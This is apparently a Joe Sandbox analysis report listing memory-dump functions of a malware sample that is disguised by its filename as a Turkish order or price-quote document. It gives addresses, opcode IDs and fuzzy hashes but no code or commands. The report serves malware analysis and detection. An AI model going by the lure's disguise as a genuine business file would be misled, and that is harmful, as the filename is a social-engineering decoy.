                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1314013404.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_75a0000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 6d73a540d5fc2253aa9ada1eea20e0d6eb6c9d58978e2d9342aab97285098826
                                                                                                      • Instruction ID: 71f5f82b8bdc80736171321408a276b205aaccfebf3e3d07cc5dd5d9bc2afd1f
                                                                                                      • Opcode Fuzzy Hash: 6d73a540d5fc2253aa9ada1eea20e0d6eb6c9d58978e2d9342aab97285098826
                                                                                                      • Instruction Fuzzy Hash: 13119DB5A10206AFD760DB68C644BAAFBF5FF44360F44843AE408CB655E734E906CF90
                                                                                                      Function 075A3A58 Relevance: .1, Instructions: 57COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1314013404.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_75a0000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 32d52207225087a016fe5cde5673e7a2b470f6bf87cbae557475586b0aa111f5
                                                                                                      • Instruction ID: 2108d85d51ec0f78a2481f425c9ce489c99d162b496314155030973a6fe0d7a3
                                                                                                      • Opcode Fuzzy Hash: 32d52207225087a016fe5cde5673e7a2b470f6bf87cbae557475586b0aa111f5
                                                                                                      • Instruction Fuzzy Hash: DC1161727102146FE714DFA8E855EAB7BE9FB88720F14452AF505DB280EB72E90587A0
                                                                                                      Function 075A8F59 Relevance: .1, Instructions: 56COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1314013404.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_75a0000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 2e228824332da7979f25b65e45a3f9eeca125a172ba571f23d323352377d2ebf
                                                                                                      • Instruction ID: c57bc049cb9ef79035c66aab83110de3460fc50acf3440ef5f329fbb8cf4e1c6
                                                                                                      • Opcode Fuzzy Hash: 2e228824332da7979f25b65e45a3f9eeca125a172ba571f23d323352377d2ebf
                                                                                                      • Instruction Fuzzy Hash: FD1194316107059FD325EF39D840A8AB7F6FF85350F40C629E4499B760EB70BD058B91
                                                                                                      Function 05DD9D84 Relevance: .1, Instructions: 56COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1313837255.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_5dd0000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 5f371d403a21573d2779a59ce6fc2e0c6444f62c14e68ef0acac6a675d3d6c59
                                                                                                      • Instruction ID: b86ea384c05bac23aadc7658a206c9b2ee983a3034528ac6880ccdf17dbb3b60
                                                                                                      • Opcode Fuzzy Hash: 5f371d403a21573d2779a59ce6fc2e0c6444f62c14e68ef0acac6a675d3d6c59
                                                                                                      • Instruction Fuzzy Hash: F321C4B6910249DFDB20DF9AD884BDEFBF4FB48310F10841AE959A7210C379A954CFA5
                                                                                                      Function 013CD1CF Relevance: .1, Instructions: 53COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1309300541.00000000013CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013CD000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_13cd000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 9e088ad8a07711d9d3566a887b1f888bc4d4e2f61ff705deeaaa2a632ac83149
                                                                                                      • Instruction ID: 2fc7772810ca6452307a84317d0556707a0f683978f7f9bb54d40efacdbaed91
                                                                                                      • Opcode Fuzzy Hash: 9e088ad8a07711d9d3566a887b1f888bc4d4e2f61ff705deeaaa2a632ac83149
                                                                                                      • Instruction Fuzzy Hash: 8D11AC76504240DFDB16CF54D5C0B15BB62FB84628F24C6ADE8494B696C33AD80ACB91
                                                                                                      Function 075AB71B Relevance: .0, Instructions: 50COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1314013404.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_75a0000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 1661f0a630d640003ba9a5a083b5a8a8dea2c9eb866b5f80030d4a15c4c40bc1
                                                                                                      • Instruction ID: 465994824b64c0f9ae2c253e00db44d1f8db7fcba7a176e987fbdd9394f44001
                                                                                                      • Opcode Fuzzy Hash: 1661f0a630d640003ba9a5a083b5a8a8dea2c9eb866b5f80030d4a15c4c40bc1
                                                                                                      • Instruction Fuzzy Hash: 9C01C0F5A057829FE7258AACE0806EABBF1FB81215F18897FC44587341C775D84ACB90
                                                                                                      Function 075AFE60 Relevance: .0, Instructions: 50COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1314013404.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_75a0000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 6ece3ba771f1bc424fef489d10451e4c29ea11192dc4fb83913a3be9c81a05b0
                                                                                                      • Instruction ID: 65dd78395328ed8c7cbe851009a8853cbacdd24ce6eed7200d154a5ed7dfb3d1
                                                                                                      • Opcode Fuzzy Hash: 6ece3ba771f1bc424fef489d10451e4c29ea11192dc4fb83913a3be9c81a05b0
                                                                                                      • Instruction Fuzzy Hash: 93117335610205DFC704DF68C884DAEBBF6FF89324B148169E4198B361DB71ED02CB91
                                                                                                      Function 075AE178 Relevance: .0, Instructions: 50COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1314013404.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_75a0000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: bdbb5111865c77451da05dd76f868e8de6fcd72d27137a7d2e84465d455ed76d
                                                                                                      • Instruction ID: 573c2580298ed9356a56383e9bcde4899732e8bc378b13c1500dda27756208b9
                                                                                                      • Opcode Fuzzy Hash: bdbb5111865c77451da05dd76f868e8de6fcd72d27137a7d2e84465d455ed76d
                                                                                                      • Instruction Fuzzy Hash: 58116135B1011A9FCB14DFA8D9458AFBFFAFB88211714456AE905D7350EB319902CBE1
                                                                                                      Function 075AE168 Relevance: .0, Instructions: 50COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1314013404.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_75a0000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: ddb8aef62f1ed2236262190e3347a753dce568daf8873b4cd6d7c017b6794cad
                                                                                                      • Instruction ID: d49706c5f3f8927aa36dadc4cae466ed5d9cc051cb9d34137b66e56937d3bbd6
                                                                                                      • Opcode Fuzzy Hash: ddb8aef62f1ed2236262190e3347a753dce568daf8873b4cd6d7c017b6794cad
                                                                                                      • Instruction Fuzzy Hash: 52018435A101169FCF109FA4D9455AFBFF9FB88211B04447AE505D7240EA319902CBE1
                                                                                                      Function 075A3AE8 Relevance: .0, Instructions: 48COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1314013404.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_75a0000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: c50027b5e4d0356c7eb7072e24937695c5663227f6bb5ef66b97782b6f1758ba
                                                                                                      • Instruction ID: 695e4119261db0e362724fee5569ae433a0e9fd50f5c36491459a19a1b23618d
                                                                                                      • Opcode Fuzzy Hash: c50027b5e4d0356c7eb7072e24937695c5663227f6bb5ef66b97782b6f1758ba
                                                                                                      • Instruction Fuzzy Hash: FD0121356007058BD724DF29E880A8B77E6EF84255B008629E44A8B765EA71FD068B91
                                                                                                      Function 05DDDFE8 Relevance: .0, Instructions: 48COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1313837255.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_5dd0000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 6b9785eba590ceca8e0577c68cd8aed746ca06a19b2462ee9ead934961465508
                                                                                                      • Instruction ID: 8a893ee277885a55fb8188926f33d3d7203e0b272ba9b5a39b512d6680545ad2
                                                                                                      • Opcode Fuzzy Hash: 6b9785eba590ceca8e0577c68cd8aed746ca06a19b2462ee9ead934961465508
                                                                                                      • Instruction Fuzzy Hash: A201D2316142149FD3105B65D5593B2BBAAFF4A309B5C81EBD449CF142CA7B8883CBB6
                                                                                                      Function 05DD787B Relevance: .0, Instructions: 46COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1313837255.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_5dd0000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 20102547f80dbd86af67c1207bd0442675ee4e4b923303b7d93185235ea95699
                                                                                                      • Instruction ID: 4253f580a2b420ec96f08b9fb577b01870c5b6b32b1e40b9c5893a0cdd11db41
                                                                                                      • Opcode Fuzzy Hash: 20102547f80dbd86af67c1207bd0442675ee4e4b923303b7d93185235ea95699
                                                                                                      • Instruction Fuzzy Hash: A30181363101125BD718F77DE899ABE77EBFBC8221744417AE50ECB750EE60AC068791
                                                                                                      Function 075A8518 Relevance: .0, Instructions: 45COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1314013404.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_75a0000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: a24a173e89954335f81ab12a60e28c64a71b7c21184a24839a74047bae6a4992
                                                                                                      • Instruction ID: cdf8caf6c43717d517430e35c20c27fc208cc62592ebc28f1af9cec797df6098
                                                                                                      • Opcode Fuzzy Hash: a24a173e89954335f81ab12a60e28c64a71b7c21184a24839a74047bae6a4992
                                                                                                      • Instruction Fuzzy Hash: D701E5356007058FD725DF29E84098BB7F6FF84314B008A29F44A8B765EB71FD068B91
                                                                                                      Function 075A8510 Relevance: .0, Instructions: 45COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1314013404.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_75a0000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: e038f9eb30330518560ff24e2d2b8b55375f183846dd7c7c2b9315ea4edd4c74
                                                                                                      • Instruction ID: 672be663d4aa12766b08b51652e03343655a3b33debe6ac8cbb9428cda9f886a
                                                                                                      • Opcode Fuzzy Hash: e038f9eb30330518560ff24e2d2b8b55375f183846dd7c7c2b9315ea4edd4c74
                                                                                                      • Instruction Fuzzy Hash: 6D0112356007068FD725DF79E98098F77F6EF842147008B29E45A8B765EB70FD068B91
                                                                                                      Function 075A3AF8 Relevance: .0, Instructions: 42COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1314013404.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_75a0000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: cb4da113ee882bc921f102bfd5b3c72780a4333dd29c47b00fbf999eb022f12e
                                                                                                      • Instruction ID: 828a5987faed250e4008e46ee4707e08e641a21e98bc906b1fe2bfa533b77ccb
                                                                                                      • Opcode Fuzzy Hash: cb4da113ee882bc921f102bfd5b3c72780a4333dd29c47b00fbf999eb022f12e
                                                                                                      • Instruction Fuzzy Hash: 430112356007058BD724DF29E88498B77E5EF84310B008629F44A8B721EB70FD068B91
                                                                                                      Function 05DDCA38 Relevance: .0, Instructions: 39COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1313837255.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_5dd0000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 1deb0be3999e8fc1830251eb3f9210b2e553d18e26b8f3cac8a68d7b88afece0
                                                                                                      • Instruction ID: dfdf857d97495e42ff24fc1a3265fb4b100ec801e51a452e287569cbbf8f2f7c
                                                                                                      • Opcode Fuzzy Hash: 1deb0be3999e8fc1830251eb3f9210b2e553d18e26b8f3cac8a68d7b88afece0
                                                                                                      • Instruction Fuzzy Hash: 7DF0B432619208AFDF05DB58D841CEABFEEEF09260F058067E408DB221D6319D41C7B4
                                                                                                      Function 075A1C6A Relevance: .0, Instructions: 38COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1314013404.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_75a0000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 4d43a20434668680599bb4301391cab018edacb703077e5e177f8f9ce4673ab1
                                                                                                      • Instruction ID: 55f82af3eea69236dae50e8a311807180b717cd1b5ba4c6bb299d719f356d734
                                                                                                      • Opcode Fuzzy Hash: 4d43a20434668680599bb4301391cab018edacb703077e5e177f8f9ce4673ab1
                                                                                                      • Instruction Fuzzy Hash: B6F06D35B10A118FD748DA3AD8549A977E7AFCA650B1580BAE906CB370EE70DC028B50
                                                                                                      Function 075A1C78 Relevance: .0, Instructions: 36COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1314013404.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_75a0000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 12fd5cbe066d44f6220213e3ec81fc6bb7f8a21f774a2222c964bfb4044119a4
                                                                                                      • Instruction ID: 896145ba7486d48ee7afc425685993706ca1d2f4495beccd53974132dfd5b641
                                                                                                      • Opcode Fuzzy Hash: 12fd5cbe066d44f6220213e3ec81fc6bb7f8a21f774a2222c964bfb4044119a4
                                                                                                      • Instruction Fuzzy Hash: BDF0F4357106114FD754DB3ED45486977EBAFCE65131580B5F506C7770EE74DC028650
                                                                                                      Function 075A3B81 Relevance: .0, Instructions: 36COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1314013404.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_75a0000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 8a8042d858187e2c8a45cc55559eaa66081a5171e8f39b3c05a1b9a90b431448
                                                                                                      • Instruction ID: 25ca2fc22aa923ecfdca4ecf7995ba7b869b2150d4ff1bf7a18575a08c1b1a04
                                                                                                      • Opcode Fuzzy Hash: 8a8042d858187e2c8a45cc55559eaa66081a5171e8f39b3c05a1b9a90b431448
                                                                                                      • Instruction Fuzzy Hash: A8F028B271C38A9FCB219E749C4129B7F74AF02255B1A05BFC145D3102EA389805C762
                                                                                                      Function 05DD7888 Relevance: .0, Instructions: 35COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1313837255.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_5dd0000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 70a034d7e295e04fbef0362bb424f719bce11a915022334f06cf031d99dc897f
                                                                                                      • Instruction ID: ca1e9494b65f76bc0360965f55f2c5ca39524aeb295986f5b30fdb0594b96efe
                                                                                                      • Opcode Fuzzy Hash: 70a034d7e295e04fbef0362bb424f719bce11a915022334f06cf031d99dc897f
                                                                                                      • Instruction Fuzzy Hash: 24F05E363101119B8748E77DE8999AEBBEBFBCC261354027AE50EC7750EE70AC028791
                                                                                                      Function 075A6A28 Relevance: .0, Instructions: 34COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1314013404.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_75a0000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: ccf97aa89306e8a60d1000c53738ed1888085f87610d132e153cf1c73bf2ba2c
                                                                                                      • Instruction ID: 9782268e6e3a3f5f4e890af4e6bbc4bf970c79e4a0b785e5913443b98ecd97b0
                                                                                                      • Opcode Fuzzy Hash: ccf97aa89306e8a60d1000c53738ed1888085f87610d132e153cf1c73bf2ba2c
                                                                                                      • Instruction Fuzzy Hash: CDF0E9716093415FD3218B25D840953BFF6EF8616430880BBE548CB311EA20DC05C721
                                                                                                      Function 05DD8500 Relevance: .0, Instructions: 33COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1313837255.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_5dd0000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 8a1c8a3f2dd93486cb59d841d57bbea9999ddff04389c242468da9c4ec24c12f
                                                                                                      • Instruction ID: 9bed105f6cccc7c6ba389f677a86441115a2c0354bd05cdd00adf37ddcae3f0b
                                                                                                      • Opcode Fuzzy Hash: 8a1c8a3f2dd93486cb59d841d57bbea9999ddff04389c242468da9c4ec24c12f
                                                                                                      • Instruction Fuzzy Hash: B2F06D76E04308DFCB12CBA8C8506DDBBB2FF89311F4440AAE44597261D635A952DB50
                                                                                                      Function 075AB6A8 Relevance: .0, Instructions: 29COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1314013404.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_75a0000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 4c7ad37d9416a24b6947c140f07c49ac12477d507ca8f48acee210d02bc29b37
                                                                                                      • Instruction ID: 70194a3e052a213b93272d310ba69533a93b0b97d35811e34576ef46b3c4ee6d
                                                                                                      • Opcode Fuzzy Hash: 4c7ad37d9416a24b6947c140f07c49ac12477d507ca8f48acee210d02bc29b37
                                                                                                      • Instruction Fuzzy Hash: B9E022F2608FFA2ED73205A860103F6BFE46B42124F0C89BBD4CA87681D962D40887E0
                                                                                                      Function 05DD60B8 Relevance: .0, Instructions: 28COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1313837255.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_5dd0000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 283955b280bedf25483f808b554d5bbd67966b3f9f03f99c6c618c62f0c27c32
                                                                                                      • Instruction ID: 1850cb25442e47bc3545933c34da7bb8caae68c85d7ea94dab60d31c716b84fc
                                                                                                      • Opcode Fuzzy Hash: 283955b280bedf25483f808b554d5bbd67966b3f9f03f99c6c618c62f0c27c32
                                                                                                      • Instruction Fuzzy Hash: 16F0E5353593554FC7049B64E914926BFE9EE492A1B4501A7D889CB353C924E840C7F1
                                                                                                      Function 05DD7950 Relevance: .0, Instructions: 24COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1313837255.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_5dd0000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 62fb0c219ff96d3a291d21873ee331cdb0f61eea4aab1d3099568a323b896d20
                                                                                                      • Instruction ID: 9d59c63ca48e200e06b8edf3f232ed3e23436ec59f907ed9f8cb9c59a2d3b77a
                                                                                                      • Opcode Fuzzy Hash: 62fb0c219ff96d3a291d21873ee331cdb0f61eea4aab1d3099568a323b896d20
                                                                                                      • Instruction Fuzzy Hash: 05E0D823B046818BDF009A65D8953B4F7D1EF44224F5402EBD089CB352E557C8428395
                                                                                                      Function 05DDD948 Relevance: .0, Instructions: 16COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1313837255.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_5dd0000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: bc2d68605d94ecc4d30ddfc06925b79c6e2da44870b08ef73a30bd872850a900
                                                                                                      • Instruction ID: 680b80204288ff3e65e4aeb87f8e5ea6b6af7d239dcf4247d24ad08ae1bfb9ee
                                                                                                      • Opcode Fuzzy Hash: bc2d68605d94ecc4d30ddfc06925b79c6e2da44870b08ef73a30bd872850a900
                                                                                                      • Instruction Fuzzy Hash: 47C08C5E50F2802FE74303203CA2AF21FA4F5820343FC06C3FD80C6266D8064E4842BB
                                                                                                      Function 05DDC0F8 Relevance: .0, Instructions: 12COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1313837255.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_5dd0000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 28de908f955e446e10248e0d0575f9785a6f7eb654e9f8e32b9d02db00a06933
                                                                                                      • Instruction ID: cbde81a655551c3541a96480d6df6e7dd0f3671c77d7e0c73e965cdee1cba691
                                                                                                      • Opcode Fuzzy Hash: 28de908f955e446e10248e0d0575f9785a6f7eb654e9f8e32b9d02db00a06933
                                                                                                      • Instruction Fuzzy Hash: BDC08C687403081BD7042BB5A41A31EBACEAB84A21F204860FA0A87385EC2AA8018256
                                                                                                      Function 05DD6B40 Relevance: .0, Instructions: 11COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1313837255.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
